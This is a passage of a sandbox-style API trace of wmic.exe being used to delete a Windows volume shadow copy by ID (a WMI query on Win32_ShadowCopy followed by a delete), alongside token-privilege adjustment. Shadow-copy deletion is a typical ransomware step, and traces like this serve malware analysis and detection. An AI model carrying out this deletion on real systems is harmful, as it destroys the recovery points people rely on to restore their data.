(lpString="shadowcopy") returned 10 [0098.729] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="EXIT", cchCount2=4) returned 3 [0098.729] free (_Block=0x24cef0) [0098.729] WbemLocator:IUnknown:AddRef (This=0x1ee1390) returned 0x2 [0098.729] malloc (_Size=0x20) returned 0x24cef0 [0098.729] lstrlenW (lpString="/") returned 1 [0098.729] lstrlenW (lpString="shadowcopy") returned 10 [0098.729] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="/", cchCount2=1) returned 3 [0098.729] lstrlenW (lpString="-") returned 1 [0098.729] lstrlenW (lpString="shadowcopy") returned 10 [0098.729] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="-", cchCount2=1) returned 3 [0098.730] lstrlenW (lpString="CLASS") returned 5 [0098.730] lstrlenW (lpString="shadowcopy") returned 10 [0098.730] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CLASS", cchCount2=5) returned 3 [0098.730] lstrlenW (lpString="PATH") returned 4 [0098.730] lstrlenW (lpString="shadowcopy") returned 10 [0098.730] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="PATH", cchCount2=4) returned 3 [0098.730] lstrlenW (lpString="CONTEXT") returned 7 [0098.730] lstrlenW (lpString="shadowcopy") returned 10 [0098.730] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CONTEXT", cchCount2=7) returned 3 [0098.730] lstrlenW (lpString="shadowcopy") returned 10 [0098.730] malloc (_Size=0x16) returned 0x24cb40 [0098.730] lstrlenW (lpString="shadowcopy") returned 10 [0098.730] GetCurrentThreadId () returned 0x90c [0098.730] ??0CHString@@QEAA@XZ () returned 0x18f3a0 [0098.730] malloc (_Size=0x18) returned 0x24cae0 [0098.730] malloc (_Size=0x18) returned 0x24cb80 [0098.730] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1ee1390, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff242998 | out: ppNamespace=0xff242998*=0x1ef3a98) returned 0x0 [0098.747] free (_Block=0x24cb80) [0098.747] free (_Block=0x24cae0) [0098.747] CoSetProxyBlanket (pProxy=0x1ef3a98, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0098.747] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0098.747] GetCurrentThreadId () returned 0x90c [0098.747] ??0CHString@@QEAA@XZ () returned 0x18f238 [0098.747] malloc (_Size=0x18) returned 0x24cae0 [0098.747] malloc (_Size=0x18) returned 0x24cb80 [0098.748] malloc (_Size=0x18) returned 0x24cba0 [0098.748] malloc (_Size=0x18) returned 0x24cbc0 [0098.748] SysStringLen (param_1="root\\cli") returned 0x8 [0098.748] SysStringLen (param_1="\\") returned 0x1 [0098.748] malloc (_Size=0x18) returned 0x24cbe0 [0098.748] SysStringLen (param_1="root\\cli\\") returned 0x9 [0098.748] SysStringLen (param_1="ms_409") returned 0x6 [0098.748] free (_Block=0x24cbc0) [0098.748] free (_Block=0x24cba0) [0098.748] free (_Block=0x24cb80) [0098.748] free (_Block=0x24cae0) [0098.748] malloc (_Size=0x18) returned 0x24cae0 [0098.748] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1ee1390, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff2429a0 | out: ppNamespace=0xff2429a0*=0x1ef3b28) returned 0x0 [0098.753] free (_Block=0x24cae0) [0098.753] free (_Block=0x24cbe0) [0098.753] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0098.753] GetCurrentThreadId () returned 0x90c [0098.753] ??0CHString@@QEAA@XZ () returned 0x18f3b0 [0098.753] malloc (_Size=0x18) returned 0x24cbe0 [0098.753] malloc (_Size=0x18) returned 0x24cae0 [0098.753] malloc (_Size=0x18) returned 0x24cb80 [0098.753] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0098.753] malloc (_Size=0x3a) returned 0x24cfa0 [0098.753] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff1d1980, cbMultiByte=-1, lpWideCharStr=0x24cfa0, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0098.753] free (_Block=0x24cfa0) [0098.753] malloc (_Size=0x18) returned 0x24cba0 [0098.753] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0098.753] SysStringLen (param_1="shadowcopy") returned 0xa [0098.753] malloc (_Size=0x18) returned 0x24cbc0 [0098.754] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='shadowcopy") returned 0x26 [0098.754] SysStringLen (param_1="'") returned 0x1 [0098.754] free (_Block=0x24cba0) [0098.754] free (_Block=0x24cb80) [0098.754] free (_Block=0x24cae0) [0098.754] free (_Block=0x24cbe0) [0098.754] IWbemServices:GetObject (in: This=0x1ef3a98, strObjectPath="MSFT_CliAlias.FriendlyName='shadowcopy'", lFlags=0, pCtx=0x0, ppObject=0x18f3b8*=0x0, ppCallResult=0x0 | out: ppObject=0x18f3b8*=0x1f004e0, ppCallResult=0x0) returned 0x0 [0098.760] malloc (_Size=0x18) returned 0x24cbe0 [0098.760] IWbemClassObject:Get (in: This=0x1f004e0, wszName="Target", lFlags=0, pVal=0x18f2e0*(varType=0x0, wReserved1=0xff24, wReserved2=0x0, wReserved3=0x0, varVal1=0xff242998, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x18f2e0*(varType=0x8, wReserved1=0xff24, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_ShadowCopy", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0098.760] free (_Block=0x24cbe0) [0098.760] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0098.760] malloc (_Size=0x3e) returned 0x24cfa0 [0098.760] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0098.760] malloc (_Size=0x18) returned 0x24cbe0 [0098.760] IWbemClassObject:Get (in: This=0x1f004e0, wszName="PWhere", lFlags=0, pVal=0x18f2e0*(varType=0x0, wReserved1=0xff24, wReserved2=0x0, wReserved3=0x0, varVal1=0x33e298, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x18f2e0*(varType=0x8, wReserved1=0xff24, wReserved2=0x0, wReserved3=0x0, varVal1=" Where ID = '#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0098.760] free (_Block=0x24cbe0) [0098.760] lstrlenW (lpString=" Where ID = '#'") returned 15 [0098.760] malloc (_Size=0x20) returned 0x24cff0 [0098.760] lstrlenW (lpString=" Where ID = '#'") returned 15 [0098.760] malloc (_Size=0x18) returned 0x24cbe0 [0098.760] IWbemClassObject:Get (in: This=0x1f004e0, wszName="Connection", lFlags=0, pVal=0x18f2e0*(varType=0x0, wReserved1=0xff24, wReserved2=0x0, wReserved3=0x0, varVal1=0x38bd68, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x18f2e0*(varType=0xd, wReserved1=0xff24, wReserved2=0x0, wReserved3=0x0, varVal1=0x1f009c0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0098.760] free (_Block=0x24cbe0) [0098.760] IUnknown:QueryInterface (in: This=0x1f009c0, riid=0xff1d7360*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x18f2d0 | out: ppvObject=0x18f2d0*=0x1f009c0) returned 0x0 [0098.760] GetCurrentThreadId () returned 0x90c [0098.761] ??0CHString@@QEAA@XZ () returned 0x18f1f8 [0098.761] malloc (_Size=0x18) returned 0x24cbe0 [0098.761] IWbemClassObject:Get (in: This=0x1f009c0, wszName="Namespace", lFlags=0, pVal=0x18f220*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff1e738f, varVal2=0x24cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x18f220*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x24cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0098.761] free (_Block=0x24cbe0) [0098.761] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0098.761] malloc (_Size=0x16) returned 0x24cbe0 [0098.761] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0098.761] malloc (_Size=0x18) returned 0x24cae0 [0098.761] IWbemClassObject:Get (in: This=0x1f009c0, wszName="Locale", lFlags=0, pVal=0x18f220*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3ba648, varVal2=0x24cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x18f220*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x24cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0098.761] free (_Block=0x24cae0) [0098.761] lstrlenW (lpString="ms_409") returned 6 [0098.761] malloc (_Size=0xe) returned 0x24cae0 [0098.761] lstrlenW (lpString="ms_409") returned 6 [0098.761] malloc (_Size=0x18) returned 0x24cb80 [0098.761] IWbemClassObject:Get (in: This=0x1f009c0, wszName="User", lFlags=0, pVal=0x18f220*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3ba648, varVal2=0x24cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x18f220*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3ba648, varVal2=0x24cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0098.761] free (_Block=0x24cb80) [0098.761] malloc (_Size=0x18) returned 0x24cb80 [0098.761] IWbemClassObject:Get (in: This=0x1f009c0, wszName="Password", lFlags=0, pVal=0x18f220*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3ba648, varVal2=0x24cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x18f220*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3ba648, varVal2=0x24cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0098.761] free (_Block=0x24cb80) [0098.761] malloc (_Size=0x18) returned 0x24cb80 [0098.762] IWbemClassObject:Get (in: This=0x1f009c0, wszName="Server", lFlags=0, pVal=0x18f220*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3ba648, varVal2=0x24cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x18f220*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x24cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0098.762] free (_Block=0x24cb80) [0098.762] lstrlenW (lpString=".") returned 1 [0098.762] malloc (_Size=0x4) returned 0x247140 [0098.762] lstrlenW (lpString=".") returned 1 [0098.762] malloc (_Size=0x18) returned 0x24cb80 [0098.762] IWbemClassObject:Get (in: This=0x1f009c0, wszName="Authority", lFlags=0, pVal=0x18f220*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3ba648, varVal2=0x24cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x18f220*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3ba648, varVal2=0x24cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0098.762] free (_Block=0x24cb80) [0098.762] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0098.762] IUnknown:Release (This=0x1f009c0) returned 0x1 [0098.762] GetCurrentThreadId () returned 0x90c [0098.762] ??0CHString@@QEAA@XZ () returned 0x18f1f8 [0098.762] malloc (_Size=0x18) returned 0x24cb80 [0098.762] IWbemClassObject:Get (in: This=0x1f004e0, wszName="__RELPATH", lFlags=0, pVal=0x18f220*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3ba648, varVal2=0xd), pType=0x0, plFlavor=0x0 | out: pVal=0x18f220*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"ShadowCopy\"", varVal2=0xd), pType=0x0, plFlavor=0x0) returned 0x0 [0098.762] free (_Block=0x24cb80) [0098.762] malloc (_Size=0x18) returned 0x24cb80 [0098.762] GetCurrentThreadId () returned 0x90c [0098.762] ??0CHString@@QEAA@XZ () returned 0x18f078 [0098.763] ??0CHString@@QEAA@PEBG@Z () returned 0x18f090 [0098.763] ??0CHString@@QEAA@AEBV0@@Z () returned 0x18f020 [0098.763] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0098.763] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x24d020 [0098.763] ?Find@CHString@@QEBAHPEBG@Z () returned 0x1b [0098.763] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x18efe0 [0098.763] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x18f028 [0098.763] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x18f090 [0098.763] ??1CHString@@QEAA@XZ () returned 0x75ff8301 [0098.763] ??1CHString@@QEAA@XZ () returned 0x75ff8301 [0098.763] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x18efe8 [0098.763] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x18f020 [0098.763] ??1CHString@@QEAA@XZ () returned 0x1 [0098.763] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x24d090 [0098.763] ?Find@CHString@@QEBAHPEBG@Z () returned 0xa [0098.763] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x18efe0 [0098.763] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x18f028 [0098.763] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x18f090 [0098.763] ??1CHString@@QEAA@XZ () returned 0x75ff8301 [0098.763] ??1CHString@@QEAA@XZ () returned 0x75ff8301 [0098.763] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x18efe8 [0098.763] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x18f020 [0098.763] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0098.763] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x7fef4af4820 [0098.763] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0098.763] malloc (_Size=0x18) returned 0x24cba0 [0098.763] malloc (_Size=0x18) returned 0x24cc00 [0098.763] malloc (_Size=0x18) returned 0x24cc20 [0098.763] malloc (_Size=0x18) returned 0x24cc40 [0098.763] malloc (_Size=0x18) returned 0x24cc60 [0098.764] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0098.764] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0098.764] malloc (_Size=0x18) returned 0x24cc80 [0098.764] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0098.764] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x29 [0098.764] malloc (_Size=0x18) returned 0x24cca0 [0098.764] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x7c [0098.764] SysStringLen (param_1="\"") returned 0x1 [0098.764] free (_Block=0x24cc80) [0098.764] free (_Block=0x24cc60) [0098.764] free (_Block=0x24cc40) [0098.764] free (_Block=0x24cc20) [0098.764] free (_Block=0x24cc00) [0098.764] free (_Block=0x24cba0) [0098.764] IWbemServices:GetObject (in: This=0x1ef3b28, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x18f068*=0x0, ppCallResult=0x0 | out: ppObject=0x18f068*=0x1f00a50, ppCallResult=0x0) returned 0x0 [0098.766] malloc (_Size=0x18) returned 0x24cba0 [0098.766] IWbemClassObject:Get (in: This=0x1f00a50, wszName="Text", lFlags=0, pVal=0x18f0a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff242ac0, varVal2=0x18), pType=0x0, plFlavor=0x0 | out: pVal=0x18f0a0*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3b4aa0*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x33e030, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x18), pType=0x0, plFlavor=0x0) returned 0x0 [0098.766] free (_Block=0x24cba0) [0098.766] SafeArrayGetLBound (in: psa=0x3b4aa0, nDim=0x1, plLbound=0x18f080 | out: plLbound=0x18f080) returned 0x0 [0098.766] SafeArrayGetUBound (in: psa=0x3b4aa0, nDim=0x1, plUbound=0x18f070 | out: plUbound=0x18f070) returned 0x0 [0098.766] SafeArrayGetElement (in: psa=0x3b4aa0, rgIndices=0x18f064, pv=0x18f0b8 | out: pv=0x18f0b8) returned 0x0 [0098.766] malloc (_Size=0x18) returned 0x24cba0 [0098.766] malloc (_Size=0x18) returned 0x24cc00 [0098.766] SysStringLen (param_1="Shadow copy management.") returned 0x17 [0098.766] free (_Block=0x24cba0) [0098.766] IUnknown:Release (This=0x1f00a50) returned 0x0 [0098.766] free (_Block=0x24cca0) [0098.766] ??1CHString@@QEAA@XZ () returned 0x75ff8301 [0098.766] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0098.766] free (_Block=0x24cb80) [0098.766] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0098.767] lstrlenW (lpString="Shadow copy management.") returned 23 [0098.767] malloc (_Size=0x30) returned 0x2485c0 [0098.767] lstrlenW (lpString="Shadow copy management.") returned 23 [0098.767] free (_Block=0x24cc00) [0098.767] IUnknown:Release (This=0x1f004e0) returned 0x0 [0098.767] free (_Block=0x24cbc0) [0098.767] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0098.767] lstrlenW (lpString="PATH") returned 4 [0098.767] lstrlenW (lpString="where") returned 5 [0098.767] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="PATH", cchCount2=4) returned 3 [0098.767] lstrlenW (lpString="WHERE") returned 5 [0098.767] lstrlenW (lpString="where") returned 5 [0098.767] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0098.767] lstrlenW (lpString="/") returned 1 [0098.767] lstrlenW (lpString="ID='{05121166-67F2-4EA9-83D8-EDC08F680DA7}'") returned 43 [0098.767] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ID='{05121166-67F2-4EA9-83D8-EDC08F680DA7}'", cchCount1=43, lpString2="/", cchCount2=1) returned 3 [0098.767] lstrlenW (lpString="-") returned 1 [0098.767] lstrlenW (lpString="ID='{05121166-67F2-4EA9-83D8-EDC08F680DA7}'") returned 43 [0098.767] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ID='{05121166-67F2-4EA9-83D8-EDC08F680DA7}'", cchCount1=43, lpString2="-", cchCount2=1) returned 3 [0098.767] lstrlenW (lpString="ID='{05121166-67F2-4EA9-83D8-EDC08F680DA7}'") returned 43 [0098.767] malloc (_Size=0x58) returned 0x24d020 [0098.767] lstrlenW (lpString="ID='{05121166-67F2-4EA9-83D8-EDC08F680DA7}'") returned 43 [0098.767] lstrlenW (lpString="/") returned 1 [0098.767] lstrlenW (lpString="delete") returned 6 [0098.767] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0098.767] lstrlenW (lpString="-") returned 1 [0098.768] lstrlenW (lpString="delete") returned 6 [0098.768] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0098.768] lstrlenW (lpString="delete") returned 6 [0098.768] malloc (_Size=0xe) returned 0x24cbc0 [0098.768] lstrlenW (lpString="delete") returned 6 [0098.768] lstrlenW (lpString="GET") returned 3 [0098.768] lstrlenW (lpString="delete") returned 6 [0098.768] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0098.768] lstrlenW (lpString="LIST") returned 4 [0098.768] lstrlenW (lpString="delete") returned 6 [0098.768] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0098.768] lstrlenW (lpString="SET") returned 3 [0098.768] lstrlenW (lpString="delete") returned 6 [0098.768] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0098.768] lstrlenW (lpString="CREATE") returned 6 [0098.768] lstrlenW (lpString="delete") returned 6 [0098.768] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0098.768] lstrlenW (lpString="CALL") returned 4 [0098.768] lstrlenW (lpString="delete") returned 6 [0098.768] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0098.768] lstrlenW (lpString="ASSOC") returned 5 [0098.768] lstrlenW (lpString="delete") returned 6 [0098.768] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0098.768] lstrlenW (lpString="DELETE") returned 6 [0098.768] lstrlenW (lpString="delete") returned 6 [0098.768] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0098.768] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0098.768] malloc (_Size=0x3e) returned 0x24d080 [0098.768] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0098.768] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff20 | out: _String="Select", _Context=0xffffffffffffff20) returned="Select" [0098.768] malloc (_Size=0x18) returned 0x24cc00 [0098.769] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x0 | out: _String=0x0, _Context=0x0) returned="*" [0098.769] lstrlenW (lpString="FROM") returned 4 [0098.769] lstrlenW (lpString="*") returned 1 [0098.769] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0098.769] malloc (_Size=0x18) returned 0x24cb80 [0098.769] free (_Block=0x24cc00) [0098.769] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3b00760009 | out: _String=0x0, _Context=0x3b00760009) returned="from" [0098.769] lstrlenW (lpString="FROM") returned 4 [0098.769] lstrlenW (lpString="from") returned 4 [0098.769] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0098.769] malloc (_Size=0x18) returned 0x24cc00 [0098.769] free (_Block=0x24cb80) [0098.769] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3c00760009 | out: _String=0x0, _Context=0x3c00760009) returned="Win32_ShadowCopy" [0098.769] malloc (_Size=0x18) returned 0x24cb80 [0098.769] free (_Block=0x24cc00) [0098.769] free (_Block=0x24d080) [0098.769] free (_Block=0x24cb80) [0098.769] lstrlenW (lpString="SET") returned 3 [0098.769] lstrlenW (lpString="delete") returned 6 [0098.769] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0098.769] lstrlenW (lpString="CREATE") returned 6 [0098.769] lstrlenW (lpString="delete") returned 6 [0098.769] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0098.769] free (_Block=0x24cef0) [0098.769] malloc (_Size=0x8) returned 0x246f20 [0098.769] lstrlenW (lpString="GET") returned 3 [0098.769] lstrlenW (lpString="delete") returned 6 [0098.770] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0098.770] lstrlenW (lpString="LIST") returned 4 [0098.770] lstrlenW (lpString="delete") returned 6 [0098.770] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0098.770] lstrlenW (lpString="ASSOC") returned 5 [0098.770] lstrlenW (lpString="delete") returned 6 [0098.770] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0098.770] WbemLocator:IUnknown:AddRef (This=0x1ee1390) returned 0x3 [0098.770] free (_Block=0x41dfb0) [0098.770] lstrlenW (lpString="") returned 0 [0098.770] lstrlenW (lpString="XDUWTFONO") returned 9 [0098.770] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0098.770] lstrlenW (lpString="XDUWTFONO") returned 9 [0098.770] malloc (_Size=0x14) returned 0x24cb80 [0098.770] lstrlenW (lpString="XDUWTFONO") returned 9 [0098.770] GetCurrentThreadId () returned 0x90c [0098.770] GetCurrentProcess () returned 0xffffffffffffffff [0098.770] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x18f440 | out: TokenHandle=0x18f440*=0x27c) returned 1 [0098.770] GetTokenInformation (in: TokenHandle=0x27c, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18f438 | out: TokenInformation=0x0, ReturnLength=0x18f438) returned 0 [0098.770] malloc (_Size=0x118) returned 0x24d080 [0098.770] GetTokenInformation (in: TokenHandle=0x27c, TokenInformationClass=0x3, TokenInformation=0x24d080, TokenInformationLength=0x118, ReturnLength=0x18f438 | out: TokenInformation=0x24d080, ReturnLength=0x18f438) returned 1 [0098.770] AdjustTokenPrivileges (in: TokenHandle=0x27c, DisableAllPrivileges=0, NewState=0x24d080*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=-1795194526, Attributes=0x7478), (Luid.LowPart=0x0, Luid.HighPart=2412272, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0098.770] free (_Block=0x24d080) [0098.770] CloseHandle (hObject=0x27c) returned 1 [0098.770] lstrlenW (lpString="GET") returned 3 [0098.770] lstrlenW (lpString="delete") returned 6 [0098.770] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0098.770] lstrlenW (lpString="LIST") returned 4 [0098.770] lstrlenW (lpString="delete") returned 6 [0098.770] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0098.771] lstrlenW (lpString="SET") returned 3 [0098.771] lstrlenW (lpString="delete") returned 6 [0098.771] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0098.771] 